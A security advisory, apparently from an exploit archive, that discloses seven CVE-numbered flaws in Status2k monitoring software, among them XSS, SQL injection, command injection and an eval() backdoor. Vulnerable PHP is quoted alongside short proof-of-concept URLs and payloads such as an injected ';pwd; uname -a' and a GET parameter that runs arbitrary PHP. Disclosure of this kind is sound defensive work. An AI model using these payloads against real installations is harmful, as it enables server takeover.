what you don't know can hurt you

Status2k XSS / SQL Injection / Command Execution

Status2k XSS / SQL Injection / Command Execution
Posted Aug 3, 2014
Authored by Shayan Sadigh

Status2k server monitoring software suffers from cross site scripting, remote command execution, information disclosure, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, info disclosure
advisories | CVE-2014-5088, CVE-2014-5089, CVE-2014-5090, CVE-2014-5091, CVE-2014-5092, CVE-2014-5093, CVE-2014-5094
MD5 | e75af16cdf321301685ed9f89d8cf450

Status2k XSS / SQL Injection / Command Execution

Change Mirror Download
# Exploit Title: Status2k Multiple Vulnerabilities/0days
# Date: 6/20/2014
# Exploit Author: Shayan Sadigh (twitter.com/r1pplex) | <ienjoy.ripples@gmail.com
# Vendor Homepage: http://status2k.com/
# Version: All
# Tested on: Linux/Windows
# CVE : CVE-2014-5088, CVE-2014-5089, CVE-2014-5090, CVE-2014-5091, CVE-2014-5092, CVE-2014-5093, CVE-2014-5094

1. Cross site scripting/XSS... there's tons, example
admin login page, etc

login.php:

if (isset($_GET['username'])) { $useren = $_GET['username']; }
if (isset($_POST['password'])) { $useren = $_POST['username']; }
$q = mysql_query("SELECT * FROM ".$prefix."users");
$adminuser = $res['adminuser']; // Login Database
$cusername = $_COOKIE["S2KUser"];
if ( ($cusername == $adminuser) && ($cpassword == $adminpass) ) { $lgtrue = 1; }
if ( ($useren == $adminuser) && ($passen == $adminpass) ) {
setcookie("S2KUser", $useren);
if ($passen && $useren) {
if ($useren !== $adminuser) { echo '<div class="alert-message error"
Username ('.$useren.') Incorrect.</div'; }
<input type="text" name="username" size="25"

simple injection can be done in the username field, <scriptalert("poc")</script, etc

Use CVE-2014-5088 for all of the XSS issues.


2. SQLi vulnerability in the GET (log)
param... This isn't too useful seeing that if you had auth,
much more damage could be done - refer to command injection
lack of sanitization: in /admin/options/logs.php

$l = $_GET['log'];
$q = mysql_query("SELECT * FROM ".$prefix."users");
$query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'");
$result = mysql_fetch_array($query) or die(mysql_error());
$query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'");
$result = mysql_fetch_array($query) or die(mysql_error());
$query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'");
$result = mysql_fetch_array($query) or die(mysql_error());

- PoC: site.com/s2kdir/admin/options/logs.php?log=[sqli]

Use CVE-2014-5089.


3. Command injection
This requires access to the Status2k Admin
Panel, log-in and proceed to click the 'Logs' tab, then select
'Add Logs', type in any name and for the 'Location' field use
command injection... Then browse to the created log via the 'Logs'
tab again.

- example: Logs --Add Logs --; then Logs --newly created log

Name: test Location: /var/log/dmesg;pwd; uname -a
localhost/admin/options/addlog.php?type=edit&id=5

so there's no sanitization in addlog.php which lets you put anything
you want as a log location... the issue now is that in logs.php:

$logc = cmdrun($config['logcmd'].$result['location']);
$log = explode("\n", $logc);
$log = array_reverse($log);

cmdrun literally calls the equivalent of exec() and thus completely
execution of a command.

if it is complaining about dmesg... try other log locations... such as
/usr/local/apache/logs/suexec_log, also try other bash chars, such as

| & && ; $(), etc

Use CVE-2014-5090.


4. eval() [RCE] backdoor..
For about a year, status2k.com was hosting a backdoored version
of their software... either they knew it or not, there was never an
announcement when the backdoor was found (good job).

in the file /includes/functions.php:
eval($_GET['multies']);

site.com/s2k/includes/functions.php?multies=inject_php_code here

PoC: site.com/s2k/includes/functions.php?multies=echo 'foobar';

Use CVE-2014-5091.


5. Another RCE
status2k also lacks sanitization in the templates; /admin/options/editpl.php

one can literally place any malicious php code they want here and have it execute

// Let's make sure the file exists and is writable first.
if (is_writable("../../templates/".$config['templaten']."/".$filename)) {

// In our example we're opening $filename in append mode.
// The file pointer is at the bottom of the file hence
// that's where $somecontent will go when we fwrite() it.
if (!$handle = fopen("../../templates/".$config['templaten']."/".$filename, 'w')) {
echo "Cannot open file (../../templates/".$config['templaten']."/".$filename.")";
exit;
}

// Write $somecontent to our opened file.
if (fwrite($handle, $value) === FALSE) {
echo "Cannot write to file (../../templates/".$config['templaten']."/".$filename.")";
exit;
} else {
echo "Success, $filename updated!";

once again complete lack of sanitization.

Use CVE-2014-5092.


6. Design flaw by default Status2k does not remove the install
directory (/install/), this may lead to an attacker resetting the
admin credentials and thus logging in and causing further damage
through RCE vectors listed above.

Use CVE-2014-5093.


7. Information leak... it is not shown by default on the index.php
of status2k above version 2, however // PHPINFO ========== //
================== $action = $_GET["action"]; if ($action ==
"phpinfo") { phpinfo(); die(); } allows anyone to view the server's
phpinfo page (localhost/status/index.php?action=phpinfo)

Use CVE-2014-5094.

Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    1 Files
  • 24
    Jan 24th
    1 Files
  • 25
    Jan 25th
    36 Files
  • 26
    Jan 26th
    26 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close